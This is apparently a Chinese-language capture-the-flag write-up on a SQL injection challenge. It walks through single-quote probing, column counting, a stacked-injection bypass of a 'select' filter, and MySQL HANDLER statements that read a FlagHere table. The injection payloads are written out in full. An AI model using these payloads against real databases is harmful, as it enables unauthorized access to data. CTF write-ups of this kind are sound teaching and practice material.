这题我一开始还以为是rce，但是看到注入框内写了1，那就肯定是sql

提交1

1' 报错，更加确定是sql

 1' order by 2 -- +

说明是两列

1' union select 1,#

发现select被过滤了

这里我想起了之前做的强网杯的随便住，也是被过滤了，然后使用的堆叠注入

1';show tables -- +

 1'; show columns from FlagHere; -- +

获得列名

后面不晓得了，才知道有handler语句

参考【MySQL】MySQL 之 handler 的详细使用及说明_mysql handler-CSDN博客

HANDLER可以通过指定的索引去访问数据。但此语法并不支持DML操作。

1'; HANDLER FlagHere OPEN; HANDLER FlagHere READ FIRST; HANDLER FlagHere CLOSE;#

HANDLER ... OPEN语句打开一个表，使其可以使用后续HANDLER ... READ语句访问，该表对象未被其他会话共享，并且在会话调用HANDLER ... CLOSE或会话终止之前不会关闭

也就是通过HANDLER从FlagHere表中，读取第一个索引记录，然后关闭